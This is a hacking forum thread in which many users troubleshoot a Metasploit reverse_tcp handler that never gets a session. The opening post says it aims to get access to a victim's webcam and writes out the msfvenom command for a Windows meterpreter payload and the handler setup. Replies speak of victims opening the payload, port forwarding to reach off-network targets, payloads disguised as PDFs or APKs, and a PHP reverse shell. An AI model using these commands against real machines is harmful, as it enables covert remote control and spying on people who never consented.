Forum Thread: Metasploit reverse_tcp Handler Problem

Hi, I am a Kali Linux user,
and I used metasploit to get access of the webcam.
In the last virtual machine, it worked well, but in this virtual machine, the payload does not execute.
I did :
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.x.x LPORT=4444 -f exe > /root/Desktop/abc.exe

Until now, It successfully worked, but in the metasploit framework console,

use exploit/multi/handler
set LHOST 192.168.xx
set LPORT 4444
exploit -j -z
then it says
Exploit running as background job 0.
Started reverse TCP handler on 192.168.x.x:4444

Then it does nothing.
So I can not even use Veil,TheFatRat,zirikatu now.....
Please Help.

47 Responses

It means that it's waiting the user to open the payload ....
And when user will open the payload it will look like this ....

And if it didn't automaticly didn't redirect you to meterpreter do:
sessions -i
And it will look like this:

And if the user didn't open the payload it will look like this :

>>IMPORTANT<<
>If user is not on your network then you must port forward !<

Yes, I know that the victim should open the payload.... But my problem is that it just does not work.. Here is the picture.

Yes, I know that the victim should open the payload.... But my problem is that it just does not work.. Here is the picture.

Whic operating system are you using because that usn't kali linux

It is Kali linux, I just changed the background and the looking....

For those who are having a problem of reverse shell in virtual box...
I have found the only solution ...which is using wireless adapters inspite of using internal wired one...
So if u use external wireless card your problem would propably solved..,(For me it worked 100%)

In India the cheapest wireless adapter which is even capable of monitor mode and packet injection starts at 300 ruppess only...

Hope it helped

yeah,i think this is in my case too .I also tried many methods to solve this problm,but ended in failure.can live booting kali linus or parrot solve this problem?

my wifi adapter is 802.11ac .Am using acer nitro 5

I will look up for you ...
:P
I will reply you when i find the answer

Open the payload and if it respond it is all ok

So the problem is that it does not respond....

How to open the payload i am new in Kali Linux

Oh, Problem solved... I just needed to do upgrading and adding port 4444 to the virtual machine :P By the way, rubixpower, I really appreciate your help, if it wasn't you, I might have not figured out what the problem is...

I am happy that you solved that problem :) if you need help somewhere else just reply me here and i will reply you as fast a possible ...

-RubixPower

HI,

I am facing the same issue. Could you please help me how to upgrade and adding port 4444....
Thanks in Advance

i added the port but still its not working...help me out

hello Justin i have the same problem whould you like to help me out..

how did you upgrade the port number and encounter this problem can u help me with it

Please help me i have same problem i have kali not on virtual mahine its urgent

Please guide me my kali is also stuck on that

How'd you do it still confused?

Hello Justin.. I use msf6 and earlier use meterpreter connect back until later.

Lately I have this similar issue for my project work and it gets stuck and no session was not created. @Started Reverse_TCP....<IPaddress>

How did you solve your issue or how will I solve to submit my project. Thank you

me too, i am doing the mr robot ctf.
i have changed the original 404.php code to the shell php code from pentestmonkeys. (changed the ip and port ofc)
but i dont get any response on netcat or metaspoilt.

my host is win10, kali and the mr robot server are on virtualbox, both with "bridged" connection... could the "bridged" connection cause this problem?

hi please someone helps me out from it

i have an issu
e to metasploit that it stucks at
staring handler on tcp 0.0.0. 0:4444
starting handler .........
|
and just stucks down
i m using kali linu
x 2016.2

Still it doesn't work it just stucks at started tcp handler for "ip"

hey there!

facing the same problem...it get stuck when i start the exploit. However, i analized the lport with wireshark and i saw that the victims app is sending requests...dont know what to do!!

Facing the same issue also need the upgrader.apk file is their any other way to create it.

Please provide if so.

My terminal stop at this...i am using kali linux 2019.1 and my terminal did nothing after this

Same problem bro could you please help

same here could u pls help

Same problem sir how to fix this errors
????

Please help me out i have the same issue did you found the issue??? Yhave been fedup with this issue . Iam new to this field plese help me

Try MSF5 it could help...(upgrade)

Check the connection between your vbox and host if not using a vbox then make sure you gave the same IP in handler & payload.??????

Something could help right I kinda researched and found out some maybe you should use it too its MSF5

I am doing all this on android termux.
I created a payload in the form of PDF.
I shared it to my another mobile and opened it there.
Once I tried to exploit Handler is not moving ahead of started reverse tcp handler on xxxxx.
Please help me

Help me if you found solution . Been searching for any solution for it from last 3 days .iam new to cyber security field thanks.

If u are using virtual machine change NAT to bridgeadapter

Guys I'm also stuck to exploit it doesn't work, I'm using the same local IP address as Kali, how come it's not working? can you help me and the first time i try

Guys I'm also stuck to exploit it doesn't work, I'm using the same local IP address as Kali, how come it's not working? can you help me and the first time i try

Find a solution if yess please help me to

I can't solve this problem. I wait on terminal screen.

Image via imgur.com

Share Your Thoughts

  • Hot
  • Active